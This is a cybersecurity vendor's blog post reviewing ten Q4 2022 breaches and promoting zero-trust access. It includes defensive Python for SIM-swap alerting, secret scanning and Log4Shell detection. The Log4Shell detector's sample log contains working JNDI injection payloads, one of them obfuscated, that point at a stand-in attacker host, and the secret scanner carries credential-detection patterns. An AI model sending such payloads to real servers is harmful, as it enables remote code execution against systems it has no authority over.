Dec 28, 2022

10 Cybersecurity Breaches of Q4 2022 and How to Prevent Them

This blog reviews 10 of the biggest cyberattacks of Q4 2022 and reveals how the zero-trust model can help mitigate similar attacks in the future.

2022 is coming to a close, and the many prominent organizations that fell victim to cyberattacks in Q4 are undoubtedly glad to bid the year farewell. But what’s the best way to ensure 2023 isn’t just a repeat of the same old breaches? 

The zero-trust security framework offers significant advantages over the outdated perimeter approach. Let’s review 10 of the biggest cyberattacks of Q4 2022 and examine how similar attacks can be mitigated by implementing the zero-trust model.

1. Verizon: PII Theft

In October 2022, bad actors gained access to Verizon customer accounts after obtaining the last four digits of those customers’ credit card numbers. The attackers used this personally identifiable information (PII) to take control of some of the phone numbers belonging to the breached accounts, in what is known as SIM swapping: the carrier is induced to move a victim’s number onto a SIM the attacker controls, so that calls and SMS one-time codes for the victim’s other accounts are delivered to the attacker. Social engineering or compromised employees may also have played a role in this attack.

How Zero-Trust Could Have Helped: MFA and Anomaly Detection

While we lack information on exactly how this attack was conducted, the blast radius of the breach could have been limited substantially had multi-factor authentication (MFA) been in place. With MFA, users are verified according to multiple factors rather than a single password or PIN. Additional verification factors can include one-time passwords (OTPs) generated by an authenticator app, hardware tokens, geographical location, biometric data, and more. One caveat matters here: an SMS code sent to the customer’s phone number is not a useful second factor against SIM swapping, because capturing that number is the whole point of the attack. With a factor that lives outside the phone number, the last four digits of a credit card number become insufficient to perform sensitive actions such as moving a number to a new SIM.

MFA is an important control that should be enabled not just by Verizon but by every company, because breached customer data from one organization is routinely used to pass identity checks at another. The credit card data involved in the Verizon attack, for example, might be used to access the same customers’ utility accounts, e-commerce accounts, banks, and more.

In the aftermath of the attack, Verizon advised customers to set a new PIN code, password and secret question. These measures are standard security hygiene, but MFA would provide the protection without shifting the burden onto the customer. Zero-trust access solutions like Cyolo also enable passwordless authentication, removing the need for passwords altogether.

Beyond MFA, the anomaly detection capabilities of a zero-trust platform could have lessened the damage of the Verizon breach by recognizing unusual activity and raising an alert. For instance, a tool with real-time session monitoring could have flagged an unusually high volume of SIM swap requests from one agent or source, or requests on accounts whose history gave no reason to expect one (a PIN reset minutes earlier is a classic precursor). With such an alert in hand, the security team could have recognized the breach, ejected the attackers from the system, and limited the incident’s impact.
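As an added illustration of the detection logic described above (my own code, not Cyolo’s product), the following script runs two rules over a constructed audit log: a velocity rule that fires when one actor performs three or more SIM swaps within ten minutes, and a sequence rule that fires when a swap follows a PIN change on the same account within two hours. The log format, field names and thresholds are assumptions made for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample audit log for this example (not real carrier telemetry).
# One event per line: ISO timestamp followed by key=value fields.
SAMPLE_LOG = """\
2022-10-04T09:58:00Z actor=agent17 account=A100 action=pin_change
2022-10-04T10:01:00Z actor=agent17 account=A100 action=sim_swap
2022-10-04T10:03:00Z actor=agent17 account=A101 action=sim_swap
2022-10-04T10:04:30Z actor=agent17 account=A102 action=sim_swap
2022-10-04T10:06:00Z actor=agent17 account=A103 action=sim_swap
2022-10-04T11:00:00Z actor=agent42 account=A200 action=sim_swap
2022-10-04T13:30:00Z actor=agent42 account=A201 action=pin_change
2022-10-05T09:00:00Z actor=agent42 account=A201 action=sim_swap
"""

VELOCITY_WINDOW = timedelta(minutes=10)     # assumed tuning values
VELOCITY_THRESHOLD = 3                      # 3+ swaps by one actor in the window
RESET_TO_SWAP_WINDOW = timedelta(hours=2)   # PIN reset shortly before a swap


def parse_line(line: str) -> dict:
    """Parse 'TIMESTAMP key=value key=value ...' into a dict with a datetime ts."""
    ts, *fields = line.split()
    event = dict(field.split("=", 1) for field in fields)
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect(log_text: str) -> list:
    """Return alerts for the two SIM-swap rules, in the order the events arrive."""
    alerts = []
    recent_swaps = defaultdict(deque)   # actor -> timestamps of swaps in the window
    last_pin_change = {}                # account -> timestamp of latest PIN change
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if ev["action"] == "pin_change":
            last_pin_change[ev["account"]] = ev["ts"]
            continue
        if ev["action"] != "sim_swap":
            continue
        # Rule 1: credential reset immediately followed by a swap on the same account.
        reset_ts = last_pin_change.get(ev["account"])
        if reset_ts is not None and ev["ts"] - reset_ts <= RESET_TO_SWAP_WINDOW:
            alerts.append({"rule": "pin_change_then_sim_swap", "ts": ev["ts"],
                           "actor": ev["actor"], "account": ev["account"]})
        # Rule 2: too many swaps by one actor inside a sliding time window.
        window = recent_swaps[ev["actor"]]
        window.append(ev["ts"])
        while ev["ts"] - window[0] > VELOCITY_WINDOW:
            window.popleft()
        if len(window) >= VELOCITY_THRESHOLD:
            alerts.append({"rule": "sim_swap_velocity", "ts": ev["ts"],
                           "actor": ev["actor"], "account": ev["account"],
                           "count": len(window)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

On the sample log, agent17 trips the sequence rule on account A100 and the velocity rule twice, while agent42’s two swaps, spread across a day and far from any PIN change, produce nothing. The rules assume a time-ordered log; a real pipeline would also key the velocity rule on source IP or session, not only on the agent identity.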

2. EnergyAustralia: Credentials Compromise

Also in October, critical infrastructure electricity company EnergyAustralia was breached, resulting in the exposure of 323 customer accounts. The accounts contained PII such as names, email addresses, postal addresses, bills, phone numbers, and some credit card details. In the wake of the breach, EnergyAustralia announced it was adding further layers of security, including a 12-character minimum password length.

How Zero-Trust Could Have Helped: Personal Vaults and Passwordless Verification

Passwords are a shared secret: anything that can be typed can be phished, guessed, or replayed from another breach. Zero-trust limits the reliance on passwords by verifying users through additional means such as MFA (see above), and it can eliminate the need for passwords altogether by providing a passwordless verification experience.

Even where companies still want to use passwords, they can adopt a zero-trust access solution that keeps credentials in personal vaults rather than in a central password database. In such a setup, bad actors have no single, centralized resource to attack in order to compromise a large number of employee and customer passwords at once.

3. Bed Bath & Beyond: Phishing

Retail giant Bed Bath & Beyond was breached through a phishing scam targeting an employee. With that employee’s access, the attackers reached the employee’s hard drive and some shared drives, obtaining at least some corporate data.

How Zero-Trust Could Have Helped: Network Cloaking

A primary tenet of zero-trust security is that the network remains cloaked from all users; visibility to individual network components (never the full network) is granted only to verified users. Unauthorized users therefore do not even learn what resources exist. Even if an attacker gains a foothold through a phished employee, lateral movement is curtailed because every other resource stays cloaked and requires its own verification.

In addition, anomalous behavior detection (see above) could have alerted security staff to unusual access to shared drives.

4. NHS: Third-Party Breach and Ransomware

Advanced is a third-party IT provider to the NHS, the British healthcare service. Advanced was breached, critical data was stolen, and NHS services were disrupted. The perpetrators used legitimate third-party credentials to establish a remote desktop session to the company’s Citrix server, then moved laterally across environments, escalated privileges, and deployed encryption malware. Finally, critical data was exfiltrated and encrypted to complete the ransomware attack.

The attackers used the LockBit 3.0 Ransomware-as-a-Service system. Following the attack, the Advanced security team disconnected the entire environment to contain the threat and limit the attackers’ access, which also disrupted services across the NHS. 

How Zero-Trust Could Have Helped: Citrix Replacement, MFA, and Secure Third-Party Access

Citrix provides remote virtual desktop connectivity, but an internet-facing gateway that accepts a username and password is reachable by anyone, anywhere, so a stolen credential is usable from anywhere too. Zero-trust access, which provides protected remote access while reducing that exposed attack surface, is a more secure replacement. In addition to ensuring secure connectivity, zero-trust access platforms like Cyolo include real-time session monitoring and session recording for more advanced monitoring and incident investigation.

As we’ve seen with many breaches, MFA could also have limited the damage caused by the Advanced attack. When users must be verified through multiple factors, a stolen password on its own is not sufficient to reach critical resources. Had MFA been in place, the third-party credentials alone could not have opened a connection to Advanced’s servers, and the ransomware attack would have been far harder to mount. The strongest variants are phishing-resistant factors such as FIDO2 hardware keys, since a real-time phishing proxy can relay a one-time code but not a key bound to the legitimate site.

Lastly, in the zero-trust security framework, all users are verified and authorized every time they attempt to access a system or resource (and again, they never receive access to the full network). This is true for third-party users, remote employees, acquired companies, and so on. By ensuring that all its third-party vendors, such as Advanced, connect to critical systems only via zero-trust access, the NHS can reduce the impact of future supply chain attacks.

5. Amazon: Publicly Exposed Server

An Elasticsearch server belonging to Amazon, holding valuable company data, was publicly exposed and available to anyone who knew its IP address; no password was required. The server contained 215 million entries of pseudonymized viewing data, including the name of the show or movie being streamed, the streaming device, network quality, and subscription details. The server was discoverable via Shodan.io, a search engine for internet-connected devices.

How Zero-Trust Could Have Helped: Continuous Authorization

In the traditional perimeter model for cybersecurity, a location or IP address was a strong enough identifying factor to grant a user network access. In the zero-trust approach, by contrast, users and devices need to be verified according to their identity whenever they want to access a given resource. And this verification is not one-and-done; an ongoing authorization process runs continuously to check for anomalous behavior, as described in some of the scenarios above. 

In the case of Amazon, had the exposed server been placed behind zero-trust access, attackers and casual passers-by alike would have been unable to reach it, and the actions of anyone who did use it would have been monitored in real time and recorded for auditing. The underlying error is simpler still: a datastore should never listen on a public interface without authentication, and a routine external scan of the organization’s own address space (the same thing Shodan does) would have surfaced this one.

6. AstraZeneca: Exposed Credentials

In 2021, a developer left credentials for accessing an AstraZeneca internal server on GitHub, and the so-called “user error” was corrected only after more than a year, in November 2022. The credentials enabled access to a Salesforce testing environment that also held patient data.

How Zero-Trust Could Have Helped: Developer Verification and Just-in-Time Access

Developers have access to the enterprise’s most valuable assets: production environments, source code and cloud infrastructure. Should a bad actor obtain a developer’s credentials, they can potentially carry out a widespread and destructive cyberattack. In this case the exposure appears to have been inadvertent rather than malicious, but it remains easy to see how exposed developer credentials could both seriously disrupt development and compromise patient privacy and wellbeing.

As we have seen, zero-trust is a secure alternative to access based on static credentials. When users are verified through single sign-on (SSO) and receive short-lived session tokens, long-lived credentials no longer grant direct access to SaaS systems, so developers have none to paste into code and attackers gain nothing from finding them. Just-in-time access goes a step further: privileges are granted for the duration of a task and revoked afterwards, so a credential that does leak expires on its own.

Zero-trust authorization is speedy and seamless for all users, including privileged users like developers. They are verified to ensure they can access the resources they need to, but without compromising on speed or business agility. This enables developer-reliant businesses to enjoy the benefits of zero-trust security, without disrupting the developer workflow.
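The practical check that would have caught the AstraZeneca exposure much sooner is scanning committed content for credentials before (or after) it reaches GitHub. Below is an added example of such a scanner, my own code rather than anything from AstraZeneca or Cyolo. It combines known token formats (the `AKIA` AWS access key ID and `ghp_` GitHub token prefixes are documented public formats), a generic credential-assignment pattern with a placeholder allowlist, and a Shannon-entropy check for unrecognised high-entropy literals. The sample file it scans is constructed for the example and every key value in it is fake.

```python
import math
import re

# Known token shapes (documented public formats) and a generic assignment rule.
PATTERN_RULES = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("credential_assignment", re.compile(
        r"(?:password|passwd|pwd|secret|api[_-]?key|token)\s*[:=]\s*['\"]([^'\"]{6,})['\"]",
        re.IGNORECASE)),
]
# Unknown formats: long hex or base64-looking literals with high Shannon entropy.
ENTROPY_RULES = [
    ("high_entropy_hex", re.compile(r"\b[0-9a-fA-F]{32,}\b"), 3.0),
    ("high_entropy_base64", re.compile(r"[A-Za-z0-9+/=]{20,}"), 4.5),
]
# Obvious placeholders are not findings (assumed allowlist for this example).
PLACEHOLDER = re.compile(r"example|placeholder|changeme|your_|xxx|dummy|<[^>]+>", re.IGNORECASE)

# Constructed sample for this example (not AstraZeneca's code); every value is fake.
SAMPLE_SOURCE = """\
# settings for the Salesforce sandbox integration
SF_LOGIN_URL = "https://test.salesforce.com"
SF_USERNAME = "integration.user@example.com"
SF_PASSWORD = "Wint3r2021!Sandbox"
DB_PASSWORD = "changeme"
AWS_ACCESS_KEY_ID = "AKIA3T9MFQ2B7XZ1K4PL"
HMAC_SEED = "0f1e2d3c4b5a69788796a5b4c3d2e1f0"
GITHUB_TOKEN = os.environ.get("GITHUB_TOKEN")
placeholder = "your_password_here"
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; 4.0 is the maximum for a hex string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def redact(value: str) -> str:
    """Never echo the whole secret back into CI logs."""
    return f"{value[:4]}...({len(value)} chars)"


def scan_text(text: str) -> list:
    """Return one finding per suspicious literal: line number, rule, redacted value."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        reported = []
        for kind, rx in PATTERN_RULES:
            for m in rx.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                if PLACEHOLDER.search(value):
                    continue
                reported.append(value)
                findings.append({"line": line_no, "kind": kind, "value": redact(value)})
        for kind, rx, threshold in ENTROPY_RULES:
            for m in rx.finditer(line):
                value = m.group(0)
                if any(value in r or r in value for r in reported):
                    continue  # already reported by a more specific rule
                if PLACEHOLDER.search(value) or shannon_entropy(value) <= threshold:
                    continue
                reported.append(value)
                findings.append({"line": line_no, "kind": kind, "value": redact(value)})
    return findings


def scan_file(path: str) -> list:
    """Scan one file on disk, e.g. from a pre-commit hook or CI step."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [dict(f, file=path) for f in scan_text(fh.read())]


if __name__ == "__main__":
    for finding in scan_text(SAMPLE_SOURCE):
        print(finding)
```

On the sample, the scanner reports the sandbox password, the fake AWS key and the high-entropy hex seed, and correctly ignores the `changeme` placeholder and the value read from the environment. Run `scan_file` from a pre-commit hook or a CI step and fail the build on any finding; the output shows only a redacted prefix so the scanner does not itself leak the secret into logs.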

7. US Government: Log4Shell Exploitation

An Iranian-backed hacker group breached a US Federal Government organization after exploiting the Log4Shell vulnerability (CVE-2021-44228) on an unpatched VMware Horizon server. Following the breach, they deployed an XMRig cryptocurrency miner, moved laterally to the domain controller, compromised credentials, and finally set up Ngrok reverse proxies on compromised servers to maintain access.

How Zero-Trust Could Have Helped: Denied Access and Visibility to Attackers

Zero-trust access solutions cloak the network from non-verified users, preventing attackers from seeing servers at all, let alone their vulnerabilities. The culprits in this attack would neither have reached the VMware Horizon server nor known that it was unpatched and therefore vulnerable to Log4Shell. In addition, virtual patching (blocking the exploit pattern at a proxy or web application firewall in front of the server) could have covered the Log4Shell vulnerability from the day it was disclosed until the vendor patch was applied. Virtual patching is a stopgap rather than a fix, however: the unpatched server remained exploitable by any request that slipped past the rule.
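Virtual patching for Log4Shell means recognising the `${jndi:...}` lookup in inbound request data before it reaches a vulnerable logger. The difficulty is that Log4j resolves nested lookups, so attackers split the string with `${lower:j}`, `${upper:n}` and `${env:X:-d}` default-value tricks, or URL-encode it. The added example below (my own code, not a CISA or Cyolo tool) normalises those forms before matching and runs the check over a few constructed access-log lines that use documentation-range IP addresses.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no further "${" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed access-log lines for this example (documentation-range addresses).
SAMPLE_ACCESS_LOG = [
    '203.0.113.9 - - [15/Oct/2022:12:00:01 +0000] "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Oct/2022:12:00:02 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [15/Oct/2022:12:00:03 +0000] "GET /portal/?x=${${lower:j}ndi:dns://198.51.100.7/x} HTTP/1.1" 400 "-" "curl/7.79"',
    '192.0.2.4 - - [15/Oct/2022:12:00:04 +0000] "GET /portal/?q=${amount} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]


def _resolve(match):
    """Evaluate the Log4j lookup forms attackers use to split the string."""
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)            # keep the payload intact for matching
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                     # ${prefix:name:-default} -> default
        return body.split(":-", 1)[1]
    return match.group(0)                # unknown lookup (date:, sys:, ...): leave


def normalize_lookups(s: str, max_rounds: int = 20) -> str:
    """Undo URL encoding, then resolve nested lookups from the inside out."""
    s = unquote(unquote(s))              # single and double URL encoding
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, s)
        if resolved == s:
            break
        s = resolved
    return s


def is_log4shell_probe(s: str) -> bool:
    return JNDI.search(normalize_lookups(s)) is not None


def flag_log_lines(lines) -> list:
    """Return (index, line) for every line carrying a JNDI lookup after normalisation."""
    return [(i, line) for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for idx, line in flag_log_lines(SAMPLE_ACCESS_LOG):
        print(idx, line)
```

The same function can sit in a WAF or reverse-proxy hook to reject the request, or run over archived logs to find probes that already arrived. It is a stopgap: it reduces exposure while the Horizon host waits for the vendor patch, and a determined attacker may find an encoding the normaliser does not cover, so upgrading Log4j (or removing the JndiLookup class from older versions) remains the real fix.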

As in the case of many of the other attacks we’ve highlighted, zero-trust measures like MFA, auditing, real-time monitoring and anomalous behavior detection would also have helped minimize the blast radius of this breach.

8. Dropbox: Phishing and Source Code Access

In November, a phisher impersonated CircleCI, Dropbox’s continuous integration and delivery platform, and obtained developer credentials. Because the same credentials were reused across systems, they also gave the attacker access to private GitHub code repositories and to secret API credentials.

How Zero-Trust Could Have Helped: MFA and Passwordless Access

In response to the attack, Dropbox published a blog detailing what happened and the actions planned to strengthen the security of its systems. One of these is moving to stronger, phishing-resistant MFA, so that stolen credentials alone will no longer be enough to breach critical assets.

Another key step Dropbox could take is to prevent the recycling of credentials between systems, limiting attackers’ ability to compromise accounts based on other breached accounts. As we already mentioned, some zero-trust access solutions also enable the elimination of passwords.

9. LastPass: Credentials Breach - The Sequel

LastPass was breached in August this year; then, in November, the same attackers used information taken in the first incident to breach LastPass again. In other words, what the attackers had obtained in August was still usable three months later, so the first compromise had not been fully contained.

How Zero-Trust Could Have Helped: Continuous Verification and Cloaking

The zero-trust security framework is founded on the assumption that attackers are already inside the system. In the case of the second LastPass breach, this was literally true. By securing access to critical resources and cloaking the network even from supposedly trusted users, zero-trust helps reduce the magnitude of breaches. Had zero-trust access and monitoring requirements been in place, they may have prevented the attackers from being able to exploit their previous access to compromise LastPass a second time. 

More important is the fact that zero-trust security shrinks the risk of a password breach. LastPass is an external service that stores organizational passwords, which makes its customers highly exposed to a breach of LastPass as part of their supply chain. As previously noted, zero-trust access solutions like Cyolo provide a decentralized alternative through personal vaults, so an organization’s secrets are not concentrated in a single third-party store whose compromise exposes all of them at once. In addition, zero-trust can provide a passwordless experience for users, removing the need to store passwords or manage password-related risk at all.

10. Okta: Source Code Breach

As the sun was already setting on 2022, attackers managed to conduct one more large-scale breach. Authentication provider Okta was hacked, and the attackers gained access to its private source code on GitHub. GitHub alerted Okta to the suspicious access, and Okta then hardened the security measures on its repositories. According to Okta, no customer data was impacted.

How Zero-Trust Could Have Helped: Verification for Okta and Okta's Clients

In the zero-trust model, users are verified each time they access resources and when they attempt actions like copying or pasting data. Zero-trust could have prevented access to Okta’s source code by blocking unauthorized users from it. And even if an attacker had managed to reach the source code, copy controls could have blocked a bulk clone of the repositories, or at least logged it loudly enough to be caught quickly.

In addition, zero-trust would complement Okta by providing an extra layer of security. The advanced verification and monitoring capabilities of a zero-trust access solution would have blocked the Okta attackers from accessing critical applications, eliminating the risk of Okta as a single point of failure.

Cybersecurity and Zero-Trust in 2023

As we enter a new year, it’s clear that many enterprises in many industries need stronger cybersecurity defenses to protect their systems and critical assets from the attacks that undoubtedly lie ahead. 

As we have seen, zero-trust is the most comprehensive security approach enterprises can adopt to keep sensitive data out of unauthorized hands, and implementing it is significantly easier than you may think. This recent blog series explains the three steps to zero-trust adoption. Equally important to the decision to move forward with a zero-trust initiative is the vendor you choose to work with. Top considerations should include the range of available features, support for your operations, and ease of use for both administrators and users. With the right zero-trust access platform and partner, you will be able to minimize attackers’ impact on your valuable assets in 2023 and beyond.

Learn more about how zero-trust can help you with a free Cyolo consultation.

Jennifer Tullman-Botzer

Author

Jennifer Tullman-Botzer is a cybersecurity nerd by day and a history nerd by night. She has over a decade of experience in cybersecurity marketing and is as tired as you are of hackers-in-hoodies stock images. Jennifer joined Cyolo in 2021 and currently serves as Head of Content. Prior to Cyolo, she worked in a variety of marketing roles at IBM Security. She lives in Tel Aviv, Israel.
